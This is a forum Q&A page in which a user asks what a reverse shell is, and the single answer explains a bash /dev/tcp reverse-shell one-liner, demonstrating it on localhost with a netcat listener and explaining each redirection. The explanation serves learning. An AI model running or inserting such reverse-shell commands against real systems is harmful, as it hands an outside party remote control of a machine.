Home Ask Login Register

Developers Planet

Your answer is one click away!

SoulRebel February 2016

What is reverse shell?

Could someone explain to me what is reverse shell about and in what cases are we supposed to use it? I found this http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet regarding the same, what is the meaning of:

bash -i >& /dev/tcp/ 0>&1


Kay February 2016

It's a(n insecure) remote shell introduced by the target. That's the opposite of a "normal" remote shell, that in introduced by the source.

Let's try it with localhost instead of

  • Open two tabs in your terminal.

    1. open TCP port 8080 and wait for a connection:

      nc localhost -lp 8080
    2. Open an interactive shell, and redirect the iostreams to a TCP socket:

      bash -i >& /dev/tcp/localhost/8080 0>&1


      • bash -i "If the -i option is present, the shell is interactive."
      • >& "This special syntax redirects both, stdout and stderr to the specified target."
      • (argument for >&) /dev/tcp/localhost/8080 is a TCP client connection to localhost:8080.
      • 0>&1 redirect file descriptor 0 (stdin) it fd 1 (stdout), hence the opened TCP socket is used to read input.

      Cf. http://wiki.bash-hackers.org/syntax/redirection

  • Rejoice as you have a prompt in tab 1.
  • Now imagine not using localhost, but some remote IP.

Post Status

Asked in February 2016
Viewed 3,866 times
Voted 7
Answered 1 times


Leave an answer

Quote of the day: live life